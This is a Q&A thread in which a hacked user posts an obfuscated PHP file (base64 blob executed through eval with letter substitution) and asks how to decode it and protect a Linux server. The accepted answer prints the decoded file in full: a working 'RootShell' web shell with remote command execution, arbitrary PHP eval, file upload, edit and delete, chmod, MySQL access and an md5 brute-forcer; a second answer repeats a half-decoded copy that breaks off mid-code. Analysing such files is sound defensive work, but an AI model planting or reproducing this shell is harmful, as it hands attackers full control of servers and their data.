gdzRkdGg9NjAwJT48dGQ+PGI+VXBsMjFkIGY0bDU8L2I+PGJyPjxmMnJtIDVuY3R5cDU9XCJtM2x0NHAxcnQvZjJybS1kMXQxXCIgMWN0NDJuPVwiIi4kbTUuIj9kNHI9Ii5yNTFscDF0aCgnLicpLiJcIiBtNXRoMmQ9XCJQT1NUXCI+DQo8NG5wM3QgdHlwNT1cImg0ZGQ1blwiIG4xbTU9XCJNQVhfRklMRV9TSVpFXCIgdjFsMzU9XCI2MDAwMDAwMDBcIiAvPjw0bnAzdCBzNHo1PW8wIG4xbTU9XCIzcGwyMWQ1ZGY0bDVcIiB0eXA1PVwiZjRsNVwiIC8+DQo8NG5wM3QgdHlwNT1cInMzYm00dFwiIHYxbDM1PVwiVXBsMjFkIEY0bDVcIiAvPg0KPC9mMnJtPjwvdGQ+PHRkPjxmMnJtIDFjdDQybj1cIiIuJG01LiJcIiBtNXRoMmQ9R0VUPjxiPkNoMW5nNSBENHI1Y3Qycnk8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgczR6NT11MCBuMW01PWQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ2gxbmc1IEQ0cjVjdDJyeVwiPjwvZjJybT48L3RkPg0KPHRyPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZjRsNTxicj48L2I+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1mNGw1IHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PTVkNHQ+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ3I1MXQ1IGY0bDVcIj48L2Yycm0+DQo8L3RkPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZDRyNWN0MnJ5PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1jcmQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PWNyNTF0NWQ0cj48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJDcjUxdDUgZDRyNWN0MnJ5XCI+PC9mMnJtPjwvdGQ+DQo8L3QxYmw1PiI7DQoNCn0NCg0KZjNuY3Q0Mm4gbDJnNG4oKQ0Kew0KIHByNG50ICI8dDFibDUgYjJyZDVyPTAgdzRkdGg9NjAwJSBoNTRnaHQ9NjAwJT48dGQgdjFsNGduPVwibTRkZGw1XCI+PGM1bnQ1cj4NCiA8ZjJybSAxY3Q0Mm49Ii5iMXM1bjFtNShfX0ZJTEVfXykuIiBtNXRoMmQ9XCJQT1NUXCI+PGI+UDFzc3cycmQ/PC9iPg0KIDw0bnAzdCB0eXA1PVwicDFzc3cycmRcIiBtMXhsNW5ndGg9XCJvYVwiIG4xbTU9XCJwMXNzXCI+PDRucDN0IHR5cDU9XCJzM2JtNHRcIiB2MWwzNT1cIkwyZzRuXCI+DQogPC9mMnJtPiI7DQp9DQpmM25jdDQybiByNWwyMWQoKQ0Kew0KIGg1MWQ1cigiTDJjMXQ0Mm46ICIuYjFzNW4xbTUoX19GSUxFX18pKTsNCn0NCmYzbmN0NDJuIGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCkNCnsNCiA0ZihmM25jdDQybl81eDRzdHMoJ3Axc3N0aHIzJykpeyAkbSA9ICJwMXNzdGhyMyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJzV4NWMnKSl7ICRtID0gIjV4NWMiOyB9DQogNGYoZjNuY3Q0Mm5fNXg0c3RzKCdzaDVsbF81eDVjJykpeyAkbSA9ICJzaDVsbF8gNXg1YyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJ3N5c3Q1bScpKXsgJG0gPSAic3lzdDVtIjsgfQ0KIDRmKCE0c3M1dCgkbSkpIC8vTjIgbTV0aDJkIGYyM25kIDotfA0KIHsNCiAgJG0gPSAiRDRzMWJsNWQiOw0KIH0NCiByNXQzcm4oJG0pOw0KfQ0KZjNuY3Q0Mm4gNXg1YzN0NV9jMm1tMW5kKCRtNXRoMmQsJGMybW0xbmQpDQp7DQogNGYoJG01dGgyZCA9PSAicDFzc3RocjMiKQ0KIHsNCiAgcDFzc3RocjMoJGMybW0xbmQpOw0KIH0NCiANCiA1bHM1NGYoJG01dGgyZCA9PSAiNXg1YyIpDQogew0KICA1eDVjKCRjMm1tMW5kLCRyNXMzbHQpOw0KICBmMnI1MWNoKCRyNXMzbHQgMXMgJDIzdHAzdCkNCiAgew0KICAgcHI0bnQgJDIzdHAzdC4iPGJyPiI7DQogIH0NCiB9DQogDQogNWxzNTRmKCRtNXRoMmQgPT0gInNoNWxsXzV4NWMiKQ0KIHsNCiAgcHI0bnQgc2g1bGxfNXg1YygkYzJtbTFuZCk7DQogfQ0KIA0KIDVsczU0ZigkbTV0aDJkID09ICJzeXN0NW0iKQ0KIHsNCiAgc3lzdDVtKCRjMm1tMW5kKTsNCiB9DQp9DQpmM25jdDQybiBwNXJtKCRmNGw1KQ0Kew0KIDRmKGY0bDVfNXg0c3RzKCRmNGw1KSkNCiB7DQogIHI1dDNybiBzM2JzdHIoc3ByNG50ZignJTInLCBmNGw1cDVybXMoJGY0bDUpKSwgLXUpOw0KIH0NCiA1bHM1DQogew0KICByNXQzcm4gIj8/Pz8iOw0KIH0NCn0NCmYzbmN0NDJuIGc1dF9jMmwycigkZjRsNSkNCnsNCjRmKDRzX3dyNHQxYmw1KCRmNGw1KSkgeyByNXQzcm4gImdyNTVuIjt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmIDRzX3I1MWQxYmw1KCRmNGw1KSkgeyByNXQzcm4gIndoNHQ1Ijt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmICE0c19yNTFkMWJsNSgkZjRsNSkpIHsgcjV0M3JuICJyNWQiO30NCiANCn0NCmYzbmN0NDJuIHNoMndfZDRycygkd2g1cjUpDQp7DQogNGYoNXI1ZygiXmM6IixyNTFscDF0aCgkd2g1cjUpKSkNCiB7DQogJGQ0cnAxcnRzID0gNXhwbDJkNSgnXFwnLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiA1bHM1DQogew0KICRkNHJwMXJ0cyA9IDV4cGwyZDUoJy8nLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiANCiANCiANCiAkNCA9IDA7DQogJHQydDFsID0gIiI7DQogDQogZjJyNTFjaCgkZDRycDFydHMgMXMgJHAxcnQpDQogew0KICAkcCA9IDA7DQogICRwcjUgPSAiIjsNCiAgd2g0bDUoJHAgIT0gJDQpDQogIHsNCiAgICRwcjUgLj0gJGQ0cnAxcnRzWyRwXS4iLyI7DQogICAkcCsrOw0KICAgDQogIH0NCiAgJHQydDFsIC49ICI8MSBocjVmPVwiIi5iMXM1bjFtNShfX0ZJTEVfXykuIj9kNHI9Ii4kcHI1LiRwMXJ0LiJcIj4iLiRwMXJ0LiI8LzE+LyI7DQogICQ0Kys7DQogfQ0KIA0KIHI1dDNybiAiPGhhPiIuJHQydDFsLiI8L2hhPjxicj4iOw0KfQ0KcHI0bnQgJGYyMnQ1cjsNCi8vIEV4NHQ6IG0xeWI1IHc1J3I1IDRuY2wzZDVkIHMybTV3aDVyNSAxbmQgdzUgZDJuJ3QgdzFudCB0aDUgMnRoNXIgYzJkNSB0MiBtNXNzIHc0dGggMjNycyA6LSkNCjV4NHQoKTsNCj8+DQog';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>
```

can help me to decode file
and tell me how protect server linux from encode shell

Comment: Sorry to hear you've been hacked. This doesn't look like the offending code though. It won't do anything.

Comment: Just looked at this code in a text editor and there's more than I realised.

Answer (score 4, accepted):

This is the decoded script

```
?><?php
error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename('the actual path of this script');
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }
 if($_POST['pass'] == $password)
 {
   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
 }
 reload();
}

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
 chdir($_GET['dir']);
}

$pages = array(
 'cmd' => 'Execute Command',
 'eval' => 'Evaluate PHP',
 'mysql' => 'MySQL Query',
 'chmod' => 'Chmod File',
 'phpinfo' => 'PHPinfo',
 'md5' => 'md5 cracker',
 'headers' => 'Show headers',
 'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
 font-size: 12px; 
 font-family: verdana;
 color: #33FF00;
 background: #000000;
}
#d {
 background: #003000;
}
#f {
 background: #003300;
}
#s {
 background: #006300;
}
#d:hover
{
 background: #003300;
}
#f:hover
{
 background: #003000;
}
pre {
 font-size: 10px; 
 font-family: verdana;
 color: #33FF00;
}
a:hover {
text-decoration: none;
}

input,textarea,select {
 border-top-width: 1px; 
 font-weight: bold; 
 border-left-width: 1px; 
 font-size: 10px; 
 border-left-color: #33FF00; 
 background: #000000; 
 border-bottom-width: 1px; 
 border-bottom-color: #33FF00; 
 color: #33FF00; 
 border-top-color: #33FF00; 
 font-family: verdana; 
 border-right-width: 1px; 
 border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';

//
//Page handling
//
if(isset($_REQUEST['p']))
{
  switch ($_REQUEST['p']) {

   case 'cmd': //Run command

    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
     if(isset($_REQUEST['command']))
     {
      print "<pre>";
      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
     }
   break;


   case 'edit': //Edit a fie
    if(isset($_POST['editform']))
    {
     $f = $_GET['file'];
     $fh = fopen($f, 'w') or print "Error while opening file!";
     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
     fclose($fh);
    }
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";

    if(file_exists($_GET['file']))
    {
     $rd = file($_GET['file']);
     foreach($rd as $l)
     {
      print htmlspecialchars($l);
     }
    }

    print "</textarea><input type=submit value=\"Save\"></form>";

   break;

   case 'delete': //Delete a file

    if(isset($_POST['yes']))
    {
     if(unlink($_GET['file']))
     {
      print "File deleted successfully.";
     }
     else
     {
      print "Couldn't delete file.";
     }
    }


    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
    {
     print "Are you sure you want to delete ".$_GET['file']."?<br>
     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
     <input type=hidden name=yes value=yes>
     <input type=submit value=\"Delete\">
     ";
    }


   break;


   case 'eval': //Evaluate PHP code

    print "<form action=\"".$me."?p=eval\" method=POST>
    <textarea cols=60 rows=10 name=\"eval\">";
    if(isset($_POST['eval']))
    {
     print htmlspecialchars($_POST['eval']);
    }
    else
    {
     print "print \"Yo Momma\";";
    }
    print "</textarea><br>
    <input type=submit value=\"Eval\">
    </form>";

    if(isset($_POST['eval']))
    {
     print "<h1>Output:</h1>";
     print "<br>";
     eval($_POST['eval']);
    }

   break;

   case 'chmod': //Chmod file


    print "<h1>Under construction!</h1>";
    if(isset($_POST['chmod']))
    {
    switch ($_POST['chvalue']){
     case 777:
     chmod($_POST['chmod'],0777);
     break;
     case 644:
     chmod($_POST['chmod'],0644);
     break;
     case 755:
     chmod($_POST['chmod'],0755);
     break;
    }
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
    }
    if(isset($_GET['file']))
    {
     $content = urldecode($_GET['file']);
    }
    else
    {
     $content = "file/path/please";
    }

    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
    <select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";

   break;

   case 'mysql': //MySQL Query

   if(isset($_POST['host']))
   {
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
    mysql_select_db($_POST['dbase']);
    $sql = $_POST['query'];


    $result = mysql_query($sql);

   }
   else
   {
    print "
    This only queries the database, doesn't return data!<br>
    <form action=\"".$me."?p=mysql\" method=POST>
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>

    <b>Query:<br></b<textarea name=query></textarea>
    <input type=submit value=\"Query database\">
    </form>
    ";

   }

   break;

   case 'createdir':
   if(mkdir($_GET['crdir']))
   {
   print 'Directory created successfully.';
   }
   else
   {
   print 'Couldn\'t create directory';
   }
   break;


   case 'phpinfo': //PHP Info
    phpinfo();
   break;


   case 'rename':

    if(isset($_POST['fileold']))
    {
     if(rename($_POST['fileold'],$_POST['filenew']))
     {
      print "File renamed.";
     }
     else
     {
      print "Couldn't rename file.";
     }

    }
    if(isset($_GET['file']))
    {
     $file = basename(htmlspecialchars($_GET['file']));
    }
    else
    {
     $file = "";
    }

    print "Renaming ".$file." in folder ".realpath('.').".<br>
        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
     <input type=submit value=\"Rename file\">
     </form>";
   break;

   case 'md5':
   if(isset($_POST['md5']))
   {
   if(!is_numeric($_POST['timelimit']))
   {
   $_POST['timelimit'] = 30;
   }
   set_time_limit($_POST['timelimit']);
    if(strlen($_POST['md5']) == 32)
    {

      if($_POST['chars'] == "9999")
      {
      $i = 0;
      while($_POST['md5'] != md5($i) && $i != 100000)
       {
        $i++;
       }
      }
      else
      {
       for($i = "a"; $i != "zzzzz"; $i++)
       {
        if(md5($i == $_POST['md5']))
        {
         break;
        }
       }
      }

     if(md5($i) == $_POST['md5'])
     {
       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
     }

    }

   }

   print "Will bruteforce the md5
    <form action=\"".$me."?p=md5\" method=POST>
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
    <b>Characters:</b><br><select name=\"chars\">
    <option value=\"az\">a - zzzzz</option>
    <option value=\"9999\">1 - 9999999</option>
    </select>
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
    <input type=submit value=\"Bruteforce md5\">
    </form><br>*: if set_time_limit is allowed by php.ini";
   break;

   case 'headers':
   foreach(getallheaders() as $header => $value)
   {
   print htmlspecialchars($header . ":" . $value)."<br>";

   }
   break;
  }
}
else //Default page that will be shown when the page isn't found or no page is selected.
{

 $files = array();
 $directories = array();

 if(isset($_FILES['uploadedfile']['name']))
{
 $target_path = realpath('.').'/';
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
     print "File:".  basename( $_FILES['uploadedfile']['name']). 
     " has been uploaded";
 } else{
     echo "File upload failed!";
 }
}




 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
 if ($handle = opendir('.'))
 {
  while (false !== ($file = readdir($handle))) 
  {
        if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
  foreach($directories as $file)
  {
   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }

  foreach($files as $file)
  {
   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 }
 else
 {
  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
 }

 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";

}

function login()
{
 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
 <form action=".basename('the actual path of this script')." method=\"POST\"><b>Password?</b>
 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
 </form>";
}
function reload()
{
 header("Location: ".basename('the actual path of this script'));
}
function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }

 elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }

 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }

 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}

}
function show_dirs($where)
{
 if(ereg("^c:",realpath($where)))
 {
 $dirparts = explode('\\',realpath($where));
 }
 else
 {
 $dirparts = explode('/',realpath($where));
 }



 $i = 0;
 $total = "";

 foreach($dirparts as $part)
 {
  $p = 0;
  $pre = "";
  while($p != $i)
  {
   $pre .= $dirparts[$p]."/";
   $p++;

  }
  $total .= "<a href=\"".basename('the actual path of this script')."?dir=".$pre.$part."\">".$part."</a>/";
  $i++;
 }

 return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>
```

Answer (score 3):

This is a base64 string (the "==" at the end is a clue for knowing it's base64 ;) )

This is the decoded string:

```
?><?php
5rr2r_r5p2rt4ng(0); //If th5r5 4s 1n 5rr2r, w5'll sh2w 4t, k?
$p1ssw2rd = ""; // Y23 c1n p3t 1 mdi str4ng h5r5 t22, f2r pl14nt5xt p1ssw2rds: m1x o6 ch1rs.
$m5 = b1s5n1m5(__FILE__);
$c22k45n1m5 = "w455555";

4f(4ss5t($_POST['p1ss'])) //If th5 3s5r m1d5 1 l2g4n 1tt5mpt, "p1ss" w4ll b5 s5t 5h?
{
 4f(strl5n($p1ssw2rd) == oa) //If th5 l5ngth 2f th5 p1ssw2rd 4s oa ch1r1ct5rs, thr51t 4t 1s 1n mdi.
 {
  $_POST['p1ss'] = mdi($_POST['p1ss']);
 }
 4f($_POST['p1ss'] == $p1ssw2rd)
 {
   s5tc22k45($c22k45n1m5, $_POST['p1ss'], t4m5()+oe00); //It's 1lr4ght, l5t h5m 4n
 }
 r5l21d();
}

4f(!5mpty($p1ssw2rd) && !4ss5t($_COOKIE[$c22k45n1m5]) 2r ($_COOKIE[$c22k45n1m5] != $p1ssw2rd))
{
 l2g4n();
 d45();
}
//
//D2 n2t cr2ss th4s l4n5! All c2d5 pl1c5d 1ft5r th4s bl2ck c1n't b5 5x5c3t5d w4th23t b54ng l2gg5d 4n!
//
4f(4ss5t($_GET['p']) && $_GET['p'] == "l2g23t")
{
s5tc22k45 ($c22k45n1m5, "", t4m5() - oe00);
r5l21d();
}
4f(4ss5t($_GET['d4r']))
{
 chd4r($_GET['d4r']);
}

$p1g5s = 1rr1y(
 'cmd' => 'Ex5c3t5 C2mm1nd',
 '5v1l' => 'Ev1l31t5 PHP',
 'mysql' => 'MySQL Q35ry',
 'chm2d' => 'Chm2d F4l5',
 'php4nf2' => 'PHP4nf2',
 'mdi' => 'mdi cr1ck5r',
 'h51d5rs' => 'Sh2w h51d5rs',
 'l2g23t' => 'L2g 23t'
);
//Th5 h51d5r, l4k5 4t?
$h51d5r = '<html>
<t4tl5>'.g5t5nv("HTTP_HOST").' ~ Sh5ll I</t4tl5>
<h51d>
<styl5>
td {
 f2nt-s4z5: 6apx; 
 f2nt-f1m4ly: v5rd1n1;
 c2l2r: #ooFF00;
 b1ckgr23nd: #000000;
}
#d {
 b1ckgr23nd: #00o000;
}
#f {
 b1ckgr23nd: #00oo00;
}
#s {
 b1ckgr23nd: #00eo00;
}
#d:h2v5r
{
 b1ckgr23nd: #00oo00;
}
#f:h2v5r
{
 b1ckgr23nd: #00o000;
}
pr5 {
 f2nt-s4z5: 60px; 
 f2nt-f1m4ly: v5rd1n1;
 c2l2r: #ooFF00;
}
1:h2v5r {
t5xt-d5c2r1t42n: n2n5;
}

4np3t,t5xt1r51,s5l5ct {
 b2rd5r-t2p-w4dth: 6px; 
 f2nt-w54ght: b2ld; 
 b2rd5r-l5ft-w4dth: 6px; 
 f2nt-s4z5: 60px; 
 b2rd5r-l5ft-c2l2r: #ooFF00; 
 b1ckgr23nd: #000000; 
 b2rd5r-b2tt2m-w4dth: 6px; 
 b2rd5r-b2tt2m-c2l2r: #ooFF00; 
 c2l2r: #ooFF00; 
 b2rd5r-t2p-c2l2r: #ooFF00; 
 f2nt-f1m4ly: v5rd1n1; 
 b2rd5r-r4ght-w4dth: 6px; 
 b2rd5r-r4ght-c2l2r: #ooFF00;
}
hr {
c2l2r: #ooFF00;
b1ckgr23nd-c2l2r: #ooFF00;
h54ght: ipx;
}
</styl5>
</h51d>
<b2dy bgc2l2r=bl1ck 1l4nk="#ooCC00" vl4nk="#oo9900" l4nk="#oo9900">
<t1bl5 w4dth=600%><td 4d="h51d5r" w4dth=600%>
<p 1l4gn=r4ght><b>[<1 hr5f="http://www.r22tsh5ll-t51m.4nf2">R22tSh5ll</1>]  [<1 hr5f="'.$m5.'">H2m5</1>] ';
f2r51ch($p1g5s 1s $p1g5 => $p1g5_n1m5)
{
 $h51d5r .= ' [<1 hr5f="?p='.$p1g5.'&d4r='.r51lp1th('.').'">'.$p1g5_n1m5.'</1>] ';
}
$h51d5r .= '<br><hr>'.sh2w_d4rs('.').'</td><tr><td>';
pr4nt $h51d5r;
$f22t5r = '<tr><td><hr><c5nt5r>&c2py; <1 hr5f="http://www.4r2nw1r5z.4nf2">Ir2n</1> & <1 hr5f="http://www.r22tsh5ll-t51m.4nf2">R22tSh5ll S5c3r4ty Gr23p</1></c5nt5r></td></t1bl5></b2dy></h51d></html>';

//
//P1g5 h1ndl4ng
//
4f(4ss5t($_REQUEST['p']))
{
  sw4tch ($_REQUEST['p']) {

   c1s5 'cmd': //R3n c2mm1nd

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=cmd&d4r=".r51lp1th('.')."\" m5th2d=POST><b>C2mm1nd:</b><4np3t typ5=t5xt n1m5=c2mm1nd><4np3t typ5=s3bm4t v1l35=\"Ex5c3t5\"></f2rm>";
     4f(4ss5t($_REQUEST['c2mm1nd']))
     {
      pr4nt "<pr5>";
      5x5c3t5_c2mm1nd(g5t_5x5c3t42n_m5th2d(),$_REQUEST['c2mm1nd']); //Y23 w1nt fr45s w4th th1t?
     }
   br51k;


   c1s5 '5d4t': //Ed4t 1 f45
    4f(4ss5t($_POST['5d4tf2rm']))
    {
     $f = $_GET['f4l5'];
     $fh = f2p5n($f, 'w') 2r pr4nt "Err2r wh4l5 2p5n4ng f4l5!";
     fwr4t5($fh, $_POST['5d4tf2rm']) 2r pr4nt "C23ldn't s1v5 f4l5!";
     fcl2s5($fh);
    }
    pr4nt "Ed4t4ng f4l5 <b>".$_GET['f4l5']."</b> (".p5rm($_GET['f4l5']).")<br><br><f2rm 1ct42n=\"".$m5."?p=5d4t&f4l5=".$_GET['f4l5']."&d4r=".r51lp1th('.')."\" m5th2d=POST><t5xt1r51 c2ls=90 r2ws=6i n1m5=\"5d4tf2rm\">";

    4f(f4l5_5x4sts($_GET['f4l5']))
    {
     $rd = f4l5($_GET['f4l5']);
     f2r51ch($rd 1s $l)
     {
      pr4nt htmlsp5c41lch1rs($l);
     }
    }

    pr4nt "</t5xt1r51><4np3t typ5=s3bm4t v1l35=\"S1v5\"></f2rm>";

   br51k;

   c1s5 'd5l5t5': //D5l5t5 1 f4l5

    4f(4ss5t($_POST['y5s']))
    {
     4f(3nl4nk($_GET['f4l5']))
     {
      pr4nt "F4l5 d5l5t5d s3cc5ssf3lly.";
     }
     5ls5
     {
      pr4nt "C23ldn't d5l5t5 f4l5.";
     }
    }


    4f(4ss5t($_GET['f4l5']) && f4l5_5x4sts($_GET['f4l5']) && !4ss5t($_POST['y5s']))
    {
     pr4nt "Ar5 y23 s3r5 y23 w1nt t2 d5l5t5 ".$_GET['f4l5']."?<br>
     <f2rm 1ct42n=\"".$m5."?p=d5l5t5&f4l5=".$_GET['f4l5']."\" m5th2d=POST>
     <4np3t typ5=h4dd5n n1m5=y5s v1l35=y5s>
     <4np3t typ5=s3bm4t v1l35=\"D5l5t5\">
     ";
    }


   br51k;


   c1s5 '5v1l': //Ev1l31t5 PHP c2d5

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=5v1l\" m5th2d=POST>
    <t5xt1r51 c2ls=e0 r2ws=60 n1m5=\"5v1l\">";
    4f(4ss5t($_POST['5v1l']))
    {
     pr4nt htmlsp5c41lch1rs($_POST['5v1l']);
    }
    5ls5
    {
     pr4nt "pr4nt \"Y2 M2mm1\";";
    }
    pr4nt "</t5xt1r51><br>
    <4np3t typ5=s3bm4t v1l35=\"Ev1l\">
    </f2rm>";

    4f(4ss5t($_POST['5v1l']))
    {
     pr4nt "<h6>O3tp3t:</h6>";
     pr4nt "<br>";
     5v1l($_POST['5v1l']);
    }

   br51k;

   c1s5 'chm2d': //Chm2d f4l5


    pr4nt "<h6>Und5r c2nstr3ct42n!</h6>";
    4f(4ss5t($_POST['chm2d']))
    {
    sw4tch ($_POST['chv1l35']){
     c1s5 777:
     chm2d($_POST['chm2d'],0777);
     br51k;
     c1s5 euu:
